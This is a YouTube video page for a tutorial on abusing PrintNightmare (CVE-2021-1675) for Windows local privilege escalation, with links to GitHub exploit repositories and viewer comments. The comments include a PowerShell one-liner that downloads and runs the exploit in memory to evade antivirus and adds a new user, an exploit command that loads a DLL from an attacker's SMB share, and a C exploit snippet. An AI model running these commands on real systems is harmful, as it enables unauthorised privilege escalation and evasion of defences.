Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation
6,056
Published 2021-07-05
Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.
Please consider sharing with a friend, hitting the like button, and subscribing!
Github Resources mentioned in this video:
github.com/calebstewart/CVE-2021-1675
github.com/cube0x0/CVE-2021-1675
Part Two:
• Abusing PrintNightmare RCE (CVE-2021-...
👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇
youtube.com/c/infinitelogins?sub_confirmation=1
00:00 - Intro
00:50 - Exploits on Github
02:50 - Reviewing Environment
05:40 - Running Exploit
10:00 - Mitigation
___________________________________________
Social Media:
Website: infinitelogins.com/
Twitter: twitter.com/infinitelogins
Twitch: www.twitch.tv/infinitelogins
___________________________________________
Donations and Support:
Like my content? Please consider supporting me on Patreon:
www.patreon.com/infinitelogins
Purchase a VPN Using my Affiliate Link
www.privateinternetaccess.com/pages/buy-vpn/infini…
___________________________________________
#CVE #PrintNightmare #WindowsVulnerablility
All Comments (13)
-
Part 2 show Remote Code Execution against a Domain Controller will be available today at 2 PM PDT - Check link in description!
-
Best explanation so far
-
One thing would like to see within your channel is AV evasion and stuff like that anyways its great to watch your videos
-
Nice explanation , Can the next video be about kerberos delegations ?
-
cool
-
When you run the script, do you have the "Point and Print" GPO enabled? Thank you
-
When i tried to connect user victim and password victim, it worked. However, I tried to connect that doesn't used password, it didnt worked. The command used: Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll ..... now, i can't connect if victim doesn't password.
-
This isn't going to have any problems with YouTube censorship =p. Thanks for the videos tho, been searching around for the powershell script for this
-
Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up: iex(iwr https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe" :) hope that helps
-
Is this really your typing speed? How many words per minute are you typing? LOL
-
While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...
-
Everyone says it works on all versions of windows, BUT IT DOESNT WORK ON WINDOWS 7! This: DRIVER_INFO_2W di = {}; di.cVersion = 3; di.pName = (LPWSTR)L"1111"; di.pEnvironment = (LPWSTR)L"Windows x64"; di.pDataFile = (LPWSTR)DLL_PATH; di.pConfigFile = (LPWSTR)DLL_PATH; di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL"; AddPrinterDriverExW(0, 2, (PBYTE) & di, 0); This gives error 5 on win7, on win10 before 21h2 it works.